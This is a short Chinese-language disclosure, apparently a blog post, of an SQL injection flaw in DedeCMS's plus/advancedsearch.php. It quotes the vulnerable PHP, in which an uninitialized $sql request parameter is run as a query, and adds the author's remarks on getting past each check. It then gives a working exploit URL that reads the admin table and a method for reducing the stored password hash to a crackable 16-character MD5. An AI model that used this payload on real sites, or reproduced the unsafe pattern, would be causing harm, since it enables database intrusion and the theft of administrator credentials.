摘要: plus/advancedsearch.php$sql 变量未初始化。导致鸡助注入。 if($mid == 0) // 必须绕过,By:俺是农村的。{showmsg('参数不正确,高级自定义搜索必须指定模型 i...
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助注入。
if($mid == 0) // 必须绕过,By:俺是农村的。
{
showmsg('参数不正确,高级自定义搜索必须指定模型 id', 'javascript');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from #@__advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo)) //囧啊,绕过有难度,
{
showmsg('自定义搜索模型不存在','-1');
exit();
}
$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql)) //人品问题,成功绕过!
{
..............
}
else
{
$sql = urldecode($sql);
$query = $sql;
}
$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
................
$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);
.............
$dlist->Display();
漏洞利用:
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。
